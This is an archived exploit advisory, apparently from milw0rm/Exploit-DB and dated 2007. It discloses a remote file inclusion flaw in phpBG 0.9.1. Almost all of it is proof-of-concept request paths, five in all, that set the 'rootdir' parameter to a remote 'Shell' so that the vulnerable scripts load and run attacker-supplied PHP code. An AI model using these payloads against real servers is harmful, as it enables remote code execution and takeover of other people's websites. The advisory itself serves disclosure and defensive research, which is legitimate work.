phpBG 0.9.1 - 'rootdir' Remote File Inclusion

EDB-ID:

4340


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-08-29


# phpBG 0.9.1 (rootdir) Remote File Inclusion Vulnerability
# D.Script: http://phpbg.sourceforge.net/
# POC:
#   /intern/admin/other/backup.php?admin=1&rootdir=Shell
#   /intern/admin/?rootdir=Shell
#   /intern/clan/member_add.php?rootdir=Shell
#   /intern/config/key_2.php?rootdir=Shell
#   /intern/config/forum.php?rootdir=Shell
# Discovered by: GoLd_M = [Mahmood_ali]
# Thanx To : Tryag-Team & Asbmay's Group & All My Friends

# milw0rm.com [2007-08-29]